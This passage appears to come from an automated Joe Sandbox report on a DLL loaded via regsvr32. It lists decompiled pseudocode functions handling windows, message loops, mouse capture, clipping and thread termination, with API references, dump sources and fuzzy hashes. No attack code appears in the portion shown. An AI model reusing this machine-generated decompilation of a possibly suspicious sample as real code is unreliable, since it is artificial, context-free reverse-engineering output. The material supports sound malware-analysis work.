                                                                                                                						_push(0xf108);
                                                                                                                						E100249AA(_t74, _t78, _t98, _t101, _t103);
                                                                                                                						 *_t101 = 0xf108;
                                                                                                                					} else {
                                                                                                                						_push(0xf10a);
                                                                                                                						E100249AA(_t74, _t78, _t98, _t101, _t103);
                                                                                                                						 *_t101 = 0xf10a;
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					 *((intOrPtr*)(_t103 - 0x80)) =  *((intOrPtr*)(_t74 + 0xc));
                                                                                                                					 *_t101 =  *((intOrPtr*)(_t74 + 8));
                                                                                                                					 *((intOrPtr*)(_t101 + 0x10)) =  *((intOrPtr*)(_t74 + 0x10));
                                                                                                                					 *((intOrPtr*)(_t101 + 0x1c)) =  *((intOrPtr*)(_t74 + 0x1c));
                                                                                                                					_t66 =  *((intOrPtr*)(_t74 + 0x14));
                                                                                                                					_t111 =  *((intOrPtr*)(_t66 - 0xc));
                                                                                                                					if( *((intOrPtr*)(_t66 - 0xc)) != 0) {
                                                                                                                						 *((intOrPtr*)(_t101 + 0xc)) =  *_t98( *((intOrPtr*)(E100169AB(_t74, _t103 - 0x7c, _t98, _t101, _t111))), _t66);
                                                                                                                						E10001020( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
                                                                                                                					}
                                                                                                                					_t74 =  *((intOrPtr*)(_t74 + 0x18));
                                                                                                                					_t113 =  *((intOrPtr*)(_t74 - 0xc));
                                                                                                                					if( *((intOrPtr*)(_t74 - 0xc)) != 0) {
                                                                                                                						 *((intOrPtr*)(_t101 + 4)) =  *_t98( *((intOrPtr*)(E100169AB(_t74, _t103 - 0x7c, _t98, _t101, _t113))), _t74);
                                                                                                                						E10001020( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				 *((intOrPtr*)(_t101 + 8)) =  *_t98( *((intOrPtr*)(E100169AB(_t74, _t103 - 0x7c, _t98, _t101, _t113))),  *((intOrPtr*)(_t103 - 0x80)));
                                                                                                                				_t52 = E10001020( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
                                                                                                                				_t114 =  *((intOrPtr*)(_t101 + 4));
                                                                                                                				if( *((intOrPtr*)(_t101 + 4)) == 0) {
                                                                                                                					 *((intOrPtr*)(_t101 + 4)) =  *_t98( *((intOrPtr*)(E100169AB(0, _t103 - 0x7c, _t98, _t101, _t114))),  *((intOrPtr*)(E10023187(0, _t98, _t101, _t114) + 0x10)));
                                                                                                                					_t52 = E10001020( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
                                                                                                                				}
                                                                                                                				if( *((intOrPtr*)(_t101 + 0xc)) == 0) {
                                                                                                                					_t117 =  *((intOrPtr*)(_t101 + 0x10));
                                                                                                                					if( *((intOrPtr*)(_t101 + 0x10)) != 0) {
                                                                                                                						 *((intOrPtr*)(_t101 + 0xc)) =  *_t98( *((intOrPtr*)(E100169AB(0, _t103 - 0x7c, _t98, _t101, _t117))),  *((intOrPtr*)( *((intOrPtr*)(E10023187(0, _t98, _t101, _t117) + 4)) + 0x64)));
                                                                                                                						_t52 = E10001020( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_pop(_t99);
                                                                                                                				_pop(_t102);
                                                                                                                				_pop(_t76);
                                                                                                                				return E1003B437(_t52, _t76,  *(_t103 + 0x88) ^ _t103, _t96, _t99, _t102);
                                                                                                                			}























                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 1002CEEA
                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 1002CF3B
                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 1002CF5F
                                                                                                                  • Part of subcall function 100169AB: __EH_prolog3.LIBCMT ref: 100169B2
                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 1002CFB7
                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 1002CFE0
                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 1002D00F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocString$H_prolog3_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 842698744-0
                                                                                                                • Opcode ID: 1ad4ebbb07aab1396dbf860e7577c569fbcf0b53b1807751158e8712bc95d39a
                                                                                                                • Instruction ID: bcd7e1732aa2736c2d57e1b675d4a123f59b1e6f79136b948c7992e5336b28ff
                                                                                                                • Opcode Fuzzy Hash: 1ad4ebbb07aab1396dbf860e7577c569fbcf0b53b1807751158e8712bc95d39a
                                                                                                                • Instruction Fuzzy Hash: FA414D349002489FDB20DFB4DC91A9DB7F5EF04314F10852EE5669B2A6DB70A858CF51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 81%
                                                                                                                			E100216C1(void* __ecx, void* __edx, void* __eflags) {
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t37;
                                                                                                                				signed int _t54;
                                                                                                                				intOrPtr _t57;
                                                                                                                				long _t60;
                                                                                                                				struct HWND__* _t63;
                                                                                                                				CHAR* _t64;
                                                                                                                				void* _t65;
                                                                                                                				void* _t67;
                                                                                                                				void* _t71;
                                                                                                                				void* _t72;
                                                                                                                				long _t73;
                                                                                                                				void* _t74;
                                                                                                                				void* _t75;
                                                                                                                				signed int _t77;
                                                                                                                				void* _t78;
                                                                                                                				signed int _t79;
                                                                                                                				void* _t81;
                                                                                                                
                                                                                                                				_t71 = __edx;
                                                                                                                				_t79 = _t81 - 0x9c;
                                                                                                                				_t37 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				 *(_t79 + 0x98) = _t37 ^ _t79;
                                                                                                                				_t73 =  *(_t79 + 0xa4);
                                                                                                                				_t77 = 0;
                                                                                                                				 *((intOrPtr*)(_t79 - 0x80)) =  *((intOrPtr*)(_t79 + 0xa8));
                                                                                                                				E100215E2(0);
                                                                                                                				_t67 = _t72;
                                                                                                                				_t63 = E10021616(0, _t79 - 0x70);
                                                                                                                				 *(_t79 - 0x7c) = _t63;
                                                                                                                				if(_t63 !=  *(_t79 - 0x70)) {
                                                                                                                					EnableWindow(_t63, 1);
                                                                                                                				}
                                                                                                                				 *(_t79 - 0x78) =  *(_t79 - 0x78) & _t77;
                                                                                                                				GetWindowThreadProcessId(_t63, _t79 - 0x78);
                                                                                                                				if(_t63 == 0 ||  *(_t79 - 0x78) != GetCurrentProcessId()) {
                                                                                                                					L6:
                                                                                                                					__eflags = _t73;
                                                                                                                					if(__eflags != 0) {
                                                                                                                						_t77 = _t73 + 0x78;
                                                                                                                					}
                                                                                                                					goto L8;
                                                                                                                				} else {
                                                                                                                					_t60 = SendMessageA(_t63, 0x376, 0, 0);
                                                                                                                					if(_t60 == 0) {
                                                                                                                						goto L6;
                                                                                                                					} else {
                                                                                                                						_t77 = _t60;
                                                                                                                						L8:
                                                                                                                						 *(_t79 - 0x74) =  *(_t79 - 0x74) & 0x00000000;
                                                                                                                						if(_t77 != 0) {
                                                                                                                							 *(_t79 - 0x74) =  *_t77;
                                                                                                                							_t57 =  *((intOrPtr*)(_t79 + 0xb0));
                                                                                                                							if(_t57 != 0) {
                                                                                                                								 *_t77 = _t57 + 0x30000;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						if(( *(_t79 + 0xac) & 0x000000f0) == 0) {
                                                                                                                							_t54 =  *(_t79 + 0xac) & 0x0000000f;
                                                                                                                							if(_t54 <= 1) {
                                                                                                                								_t24 = _t79 + 0xac;
                                                                                                                								 *_t24 =  *(_t79 + 0xac) | 0x00000030;
                                                                                                                								__eflags =  *_t24;
                                                                                                                							} else {
                                                                                                                								if(_t54 + 0xfffffffd <= 1) {
                                                                                                                									 *(_t79 + 0xac) =  *(_t79 + 0xac) | 0x00000020;
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						_t96 = _t73;
                                                                                                                						 *(_t79 - 0x6c) = 0;
                                                                                                                						if(_t73 == 0) {
                                                                                                                							_t64 = _t79 - 0x6c;
                                                                                                                							_t73 = 0x104;
                                                                                                                							__eflags = GetModuleFileNameA(0, _t64, 0x104) - 0x104;
                                                                                                                							if(__eflags == 0) {
                                                                                                                								 *((char*)(_t79 + 0x97)) = 0;
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							_t64 =  *(_t73 + 0x50);
                                                                                                                						}
                                                                                                                						_push( *(_t79 + 0xac));
                                                                                                                						_push(_t64);
                                                                                                                						_push( *((intOrPtr*)(_t79 - 0x80)));
                                                                                                                						_push( *(_t79 - 0x7c));
                                                                                                                						_t74 = E100186FB(_t64, _t67, _t73, _t77, _t96);
                                                                                                                						if(_t77 != 0) {
                                                                                                                							 *_t77 =  *(_t79 - 0x74);
                                                                                                                						}
                                                                                                                						if( *(_t79 - 0x70) != 0) {
                                                                                                                							EnableWindow( *(_t79 - 0x70), 1);
                                                                                                                						}
                                                                                                                						E100215E2(1);
                                                                                                                						_pop(_t75);
                                                                                                                						_pop(_t78);
                                                                                                                						_pop(_t65);
                                                                                                                						return E1003B437(_t74, _t65,  *(_t79 + 0x98) ^ _t79, _t71, _t75, _t78);
                                                                                                                					}
                                                                                                                				}
                                                                                                                			}
























                                                                                                                0x100217e7
                                                                                                                0x100217ed
                                                                                                                0x100217f4
                                                                                                                0x100217f4
                                                                                                                0x100217fc
                                                                                                                0x1002180a
                                                                                                                0x1002180b
                                                                                                                0x1002180e
                                                                                                                0x1002181b
                                                                                                                0x1002181b
                                                                                                                0x10021743

                                                                                                                APIs
                                                                                                                  • Part of subcall function 10021616: GetParent.USER32(?), ref: 10021669
                                                                                                                  • Part of subcall function 10021616: GetLastActivePopup.USER32(?), ref: 10021678
                                                                                                                  • Part of subcall function 10021616: IsWindowEnabled.USER32(?), ref: 1002168D
                                                                                                                  • Part of subcall function 10021616: EnableWindow.USER32(?,00000000), ref: 100216A0
                                                                                                                • EnableWindow.USER32(?,00000001), ref: 1002170E
                                                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 1002171C
                                                                                                                • GetCurrentProcessId.KERNEL32(?,00000000), ref: 10021726
                                                                                                                • SendMessageA.USER32 ref: 1002173B
                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,00000000), ref: 100217B8
                                                                                                                • EnableWindow.USER32(?,00000001), ref: 100217F4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 1877664794-0
                                                                                                                • Opcode ID: 39ff1a4d23844597463116a229f351031421c7d1d861e8b014c9d760862aaf35
                                                                                                                • Instruction ID: 8cf2a1d449e5ea0776503a07d191ef3b2a443f422876c6f2f627263f70026bf5
                                                                                                                • Opcode Fuzzy Hash: 39ff1a4d23844597463116a229f351031421c7d1d861e8b014c9d760862aaf35
                                                                                                                • Instruction Fuzzy Hash: EA419C3AA04258DFEB31CFA4EC85BDD7BF8EF99350F600119E9499B281D77099448F60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 81%
                                                                                                                			E1003A01A(void* __ecx, intOrPtr __edx) {
                                                                                                                				intOrPtr _v8;
                                                                                                                				struct tagMSG _v32;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				void* _t30;
                                                                                                                				void* _t32;
                                                                                                                				void* _t34;
                                                                                                                				void* _t36;
                                                                                                                				intOrPtr* _t37;
                                                                                                                				void* _t41;
                                                                                                                				intOrPtr _t53;
                                                                                                                				void* _t54;
                                                                                                                				void* _t56;
                                                                                                                				void* _t57;
                                                                                                                				void* _t58;
                                                                                                                				intOrPtr* _t59;
                                                                                                                
                                                                                                                				_t55 = __edx;
                                                                                                                				_t51 = __ecx;
                                                                                                                				_t56 = GetCapture;
                                                                                                                				_t57 = __ecx;
                                                                                                                				if(GetCapture() != 0) {
                                                                                                                					L20:
                                                                                                                					return 0;
                                                                                                                				}
                                                                                                                				E10019C16(0, _t51, _t58, SetCapture( *( *((intOrPtr*)(_t57 + 0x68)) + 0x20)));
                                                                                                                				if(E10019C16(0, _t51, _t58, GetCapture()) !=  *((intOrPtr*)(_t57 + 0x68))) {
                                                                                                                					L19:
                                                                                                                					E10039E8D(0, _t57, _t69);
                                                                                                                					goto L20;
                                                                                                                				} else {
                                                                                                                					while(GetMessageA( &_v32, 0, 0, 0) != 0) {
                                                                                                                						_t30 = _v32.message - 0x100;
                                                                                                                						if(_t30 == 0) {
                                                                                                                							__eflags =  *((intOrPtr*)(_t57 + 0x88));
                                                                                                                							if( *((intOrPtr*)(_t57 + 0x88)) != 0) {
                                                                                                                								_t51 = _t57;
                                                                                                                								E10039CE5(_t57, _v32.wParam, 1);
                                                                                                                							}
                                                                                                                							__eflags = _v32.wParam - 0x1b;
                                                                                                                							if(__eflags != 0) {
                                                                                                                								L18:
                                                                                                                								_t32 = E10019C16(0, _t51, _t58, GetCapture());
                                                                                                                								_t69 = _t32 -  *((intOrPtr*)(_t57 + 0x68));
                                                                                                                								if(_t32 ==  *((intOrPtr*)(_t57 + 0x68))) {
                                                                                                                									continue;
                                                                                                                								}
                                                                                                                							}
                                                                                                                							goto L19;
                                                                                                                						}
                                                                                                                						_t34 = _t30 - 1;
                                                                                                                						if(_t34 == 0) {
                                                                                                                							__eflags =  *((intOrPtr*)(_t57 + 0x88));
                                                                                                                							if(__eflags != 0) {
                                                                                                                								_t51 = _t57;
                                                                                                                								E10039CE5(_t57, _v32.wParam, 0);
                                                                                                                							}
                                                                                                                							goto L18;
                                                                                                                						}
                                                                                                                						_t36 = _t34 - 0xff;
                                                                                                                						if(_t36 == 0) {
                                                                                                                							_t53 = _v32.pt;
                                                                                                                							_t55 = _v8;
                                                                                                                							__eflags =  *((intOrPtr*)(_t57 + 0x88));
                                                                                                                							_push(_t53);
                                                                                                                							_push(_t53);
                                                                                                                							_t37 = _t59;
                                                                                                                							 *_t37 = _t53;
                                                                                                                							 *((intOrPtr*)(_t37 + 4)) = _v8;
                                                                                                                							_t51 = _t57;
                                                                                                                							if( *((intOrPtr*)(_t57 + 0x88)) == 0) {
                                                                                                                								E10039D19(_t51, _t56);
                                                                                                                							} else {
                                                                                                                								E10039C69(_t51);
                                                                                                                							}
                                                                                                                							goto L18;
                                                                                                                						}
                                                                                                                						_t41 = _t36;
                                                                                                                						if(_t41 == 0) {
                                                                                                                							__eflags =  *((intOrPtr*)(_t57 + 0x88));
                                                                                                                							_t54 = _t57;
                                                                                                                							if(__eflags == 0) {
                                                                                                                								E10039FD6(0, _t58, __eflags);
                                                                                                                							} else {
                                                                                                                								E10039ED2(_t54, _t55, _t56, _t57, __eflags);
                                                                                                                							}
                                                                                                                							return 1;
                                                                                                                						}
                                                                                                                						if(_t41 == 0) {
                                                                                                                							goto L19;
                                                                                                                						}
                                                                                                                						DispatchMessageA( &_v32);
                                                                                                                						goto L18;
                                                                                                                					}
                                                                                                                					_push(_v32.wParam);
                                                                                                                					E10025696();
                                                                                                                					goto L19;
                                                                                                                				}
                                                                                                                			}






















                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Capture$Message$Dispatch
                                                                                                                • String ID:
                                                                                                                • API String ID: 3654672037-0
                                                                                                                • Opcode ID: c596d68e30430a79b54defb51de4afb41233d22cbb584f62e734db44dfbab682
                                                                                                                • Instruction ID: 161f1fa8784e329d9030d683eb53ce190b162bb7d2631bbf5091d90f03dabacf
                                                                                                                • Opcode Fuzzy Hash: c596d68e30430a79b54defb51de4afb41233d22cbb584f62e734db44dfbab682
                                                                                                                • Instruction Fuzzy Hash: 34319575E002099FDB67EBB5C88596FB7E9EB46383F104429F546DB151CA30ACC0D6B1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1000C050() {
                                                                                                                				long _v4;
                                                                                                                				void* __ebx;
                                                                                                                				void* __ecx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				int _t19;
                                                                                                                				void* _t37;
                                                                                                                				void* _t38;
                                                                                                                				intOrPtr _t49;
                                                                                                                				intOrPtr _t50;
                                                                                                                				intOrPtr _t51;
                                                                                                                				intOrPtr _t53;
                                                                                                                				void* _t55;
                                                                                                                				void* _t57;
                                                                                                                
                                                                                                                				_t37 = GetExitCodeThread;
                                                                                                                				_t57 = _t38;
                                                                                                                				_v4 = 0;
                                                                                                                				_t19 = GetExitCodeThread( *(_t57 + 0x290),  &_v4);
                                                                                                                				_t55 = TerminateThread;
                                                                                                                				if(_t19 != 0 && _v4 == 0x103) {
                                                                                                                					_t53 =  *0x1006f050; // 0x0
                                                                                                                					TerminateThread( *(_t53 + 0x290), 0);
                                                                                                                					_t50 =  *0x1006f050; // 0x0
                                                                                                                					TerminateThread( *(_t50 + 0x28c), 0);
                                                                                                                				}
                                                                                                                				if(GetExitCodeThread( *(_t57 + 0x294),  &_v4) != 0) {
                                                                                                                					_t61 = _v4 - 0x103;
                                                                                                                					if(_v4 == 0x103) {
                                                                                                                						_t51 =  *0x1006f050; // 0x0
                                                                                                                						TerminateThread( *(_t51 + 0x294), 0);
                                                                                                                						_t49 =  *0x1006f050; // 0x0
                                                                                                                						TerminateThread( *(_t49 + 0x28c), 0);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				E1000BDC0(_t57);
                                                                                                                				E1002181C(_t37, _t55, _t57, _t61, 0x10058350, 0, 0);
                                                                                                                				E1001D2C4(_t57 + 0x4fc, 0x10056948);
                                                                                                                				E1001D39A(_t57 + 0x4a8, 1);
                                                                                                                				_t56 = _t57 + 0x400;
                                                                                                                				E1001D2C4(_t57 + 0x400, 0x10058344);
                                                                                                                				E1001D39A(_t56, 0);
                                                                                                                				E1001D39A(_t57 + 0x3ac, 0);
                                                                                                                				E1001D35E(_t57 + 0x304, 0);
                                                                                                                				return E1001D35E(_t57 + 0x454, 0);
                                                                                                                			}


















                                                                                                                APIs
                                                                                                                • GetExitCodeThread.KERNEL32(?,?), ref: 1000C070
                                                                                                                • TerminateThread.KERNEL32(?,00000000), ref: 1000C095
                                                                                                                • TerminateThread.KERNEL32(?,00000000), ref: 1000C0A6
                                                                                                                • GetExitCodeThread.KERNEL32(?,?), ref: 1000C0B4
                                                                                                                • TerminateThread.KERNEL32(?,00000000), ref: 1000C0D3
                                                                                                                • TerminateThread.KERNEL32(?,00000000), ref: 1000C0E4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Thread$Terminate$CodeExit
                                                                                                                • String ID:
                                                                                                                • API String ID: 2071244642-0
                                                                                                                • Opcode ID: 78a4932f579bf6e9c3620fb0e200f1d90823c1be10801c14a95c4df0e19e25e4
                                                                                                                • Instruction ID: cfd30c2ca969df88c694a723c38db842dd91de19b659530daa4bf16111861b96
                                                                                                                • Opcode Fuzzy Hash: 78a4932f579bf6e9c3620fb0e200f1d90823c1be10801c14a95c4df0e19e25e4
                                                                                                                • Instruction Fuzzy Hash: BE21C435200306ABE714E720DC95FABB399EF94714F10891DF2599B1C1CBB0BA46CB65
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E10026E8C(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				intOrPtr* _t78;
                                                                                                                				void* _t79;
                                                                                                                				void* _t80;
                                                                                                                
                                                                                                                				_t80 = __eflags;
                                                                                                                				E1003D1E6(E10054CC2, __ebx, __edi, __esi);
                                                                                                                				_t78 = __ecx;
                                                                                                                				E10024650(__ebx, _t79 - 0x40, __edi, __ecx, _t80);
                                                                                                                				 *(_t79 - 4) =  *(_t79 - 4) & 0x00000000;
                                                                                                                				GetClientRect( *(_t78 + 0x20), _t79 - 0x2c);
                                                                                                                				GetWindowRect( *(_t78 + 0x20), _t79 - 0x1c);
                                                                                                                				E10024274(_t78, _t79 - 0x1c);
                                                                                                                				OffsetRect(_t79 - 0x2c,  ~( *(_t79 - 0x1c)),  ~( *(_t79 - 0x18)));
                                                                                                                				E10023DD2(_t79 - 0x40, _t79 - 0x2c);
                                                                                                                				OffsetRect(_t79 - 0x1c,  ~( *(_t79 - 0x1c)),  ~( *(_t79 - 0x18)));
                                                                                                                				 *((intOrPtr*)( *_t78 + 0x148))(_t79 - 0x40, _t79 - 0x1c, __ecx, 0x34);
                                                                                                                				E10023E14(_t79 - 0x40, _t79 - 0x1c);
                                                                                                                				SendMessageA( *(_t78 + 0x20), 0x14,  *(_t79 - 0x3c), 0);
                                                                                                                				 *((intOrPtr*)( *_t78 + 0x14c))(_t79 - 0x40, _t79 - 0x1c);
                                                                                                                				 *(_t79 - 4) =  *(_t79 - 4) | 0xffffffff;
                                                                                                                				return E1003D2BE(E100246A4(__ebx, _t79 - 0x40, OffsetRect, _t78,  *(_t79 - 4)));
                                                                                                                			}







                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 10036264
                                                                                                                  • Part of subcall function 10024650: __EH_prolog3.LIBCMT ref: 10024657
                                                                                                                  • Part of subcall function 10024650: GetWindowDC.USER32(00000000), ref: 10024683
                                                                                                                • GetClientRect.USER32 ref: 1003627F
                                                                                                                • GetWindowRect.USER32 ref: 1003628C
                                                                                                                  • Part of subcall function 10024274: ScreenToClient.USER32(?,?), ref: 10024288
                                                                                                                  • Part of subcall function 10024274: ScreenToClient.USER32(?,?), ref: 10024291
                                                                                                                • OffsetRect.USER32 ref: 100362B3
                                                                                                                  • Part of subcall function 10023DD2: ExcludeClipRect.GDI32(?,?,?,?,?), ref: 10023DF7
                                                                                                                  • Part of subcall function 10023DD2: ExcludeClipRect.GDI32(?,?,?,?,?), ref: 10023E0C
                                                                                                                • OffsetRect.USER32 ref: 100362D1
                                                                                                                  • Part of subcall function 10023E14: IntersectClipRect.GDI32(?,?,?,?,?), ref: 10023E39
                                                                                                                  • Part of subcall function 10023E14: IntersectClipRect.GDI32(?,?,?,?,?), ref: 10023E4E
                                                                                                                • SendMessageA.USER32 ref: 100362FB
                                                                                                                  • Part of subcall function 100246A4: __EH_prolog3.LIBCMT ref: 100246AB
                                                                                                                  • Part of subcall function 100246A4: ReleaseDC.USER32(?,00000000), ref: 100246C8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$Clip$ClientH_prolog3$ExcludeIntersectOffsetScreenWindow$MessageReleaseSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 2952362992-0
                                                                                                                • Opcode ID: 454ac3561dfa692294216f166007b473c0e235b98ec0a0c92b2152a655c2891b
                                                                                                                • Instruction ID: 648a23f74cede66d190cf64de6ea21f88aa3542f86f94a7751d6a3377bec6269
                                                                                                                • Opcode Fuzzy Hash: 454ac3561dfa692294216f166007b473c0e235b98ec0a0c92b2152a655c2891b
                                                                                                                • Instruction Fuzzy Hash: E821E972E10519EFDF19DB94DC95DEEB3B8FF08310F404619F556A71A0EA34AA06CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E10021616(struct HWND__* _a4, struct HWND__** _a8) {
                                                                                                                				struct HWND__* _t7;
                                                                                                                				void* _t13;
                                                                                                                				struct HWND__** _t15;
                                                                                                                				struct HWND__* _t16;
                                                                                                                				struct HWND__* _t17;
                                                                                                                				struct HWND__* _t18;
                                                                                                                
                                                                                                                				_t18 = _a4;
                                                                                                                				_t17 = _t18;
                                                                                                                				if(_t18 != 0) {
                                                                                                                					L5:
                                                                                                                					if((GetWindowLongA(_t17, 0xfffffff0) & 0x40000000) == 0) {
                                                                                                                						L8:
                                                                                                                						_t16 = _t17;
                                                                                                                						_t7 = _t17;
                                                                                                                						if(_t17 == 0) {
                                                                                                                							L10:
                                                                                                                							if(_t18 == 0 && _t17 != 0) {
                                                                                                                								_t17 = GetLastActivePopup(_t17);
                                                                                                                							}
                                                                                                                							_t15 = _a8;
                                                                                                                							if(_t15 != 0) {
                                                                                                                								if(_t16 == 0 || IsWindowEnabled(_t16) == 0 || _t16 == _t17) {
                                                                                                                									 *_t15 =  *_t15 & 0x00000000;
                                                                                                                								} else {
                                                                                                                									 *_t15 = _t16;
                                                                                                                									EnableWindow(_t16, 0);
                                                                                                                								}
                                                                                                                							}
                                                                                                                							return _t17;
                                                                                                                						} else {
                                                                                                                							goto L9;
                                                                                                                						}
                                                                                                                						do {
                                                                                                                							L9:
                                                                                                                							_t16 = _t7;
                                                                                                                							_t7 = GetParent(_t7);
                                                                                                                						} while (_t7 != 0);
                                                                                                                						goto L10;
                                                                                                                					}
                                                                                                                					_t17 = GetParent(_t17);
                                                                                                                					L7:
                                                                                                                					if(_t17 != 0) {
                                                                                                                						goto L5;
                                                                                                                					}
                                                                                                                					goto L8;
                                                                                                                				}
                                                                                                                				_t13 = E100215D6();
                                                                                                                				if(_t13 != 0) {
                                                                                                                					L4:
                                                                                                                					_t17 =  *(_t13 + 0x20);
                                                                                                                					goto L7;
                                                                                                                				}
                                                                                                                				_t13 = E10004700();
                                                                                                                				if(_t13 != 0) {
                                                                                                                					goto L4;
                                                                                                                				}
                                                                                                                				_t17 = 0;
                                                                                                                				goto L8;
                                                                                                                			}










                                                                                                                APIs
                                                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 10021648
                                                                                                                • GetParent.USER32(?), ref: 10021656
                                                                                                                • GetParent.USER32(?), ref: 10021669
                                                                                                                • GetLastActivePopup.USER32(?), ref: 10021678
                                                                                                                • IsWindowEnabled.USER32(?), ref: 1002168D
                                                                                                                • EnableWindow.USER32(?,00000000), ref: 100216A0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
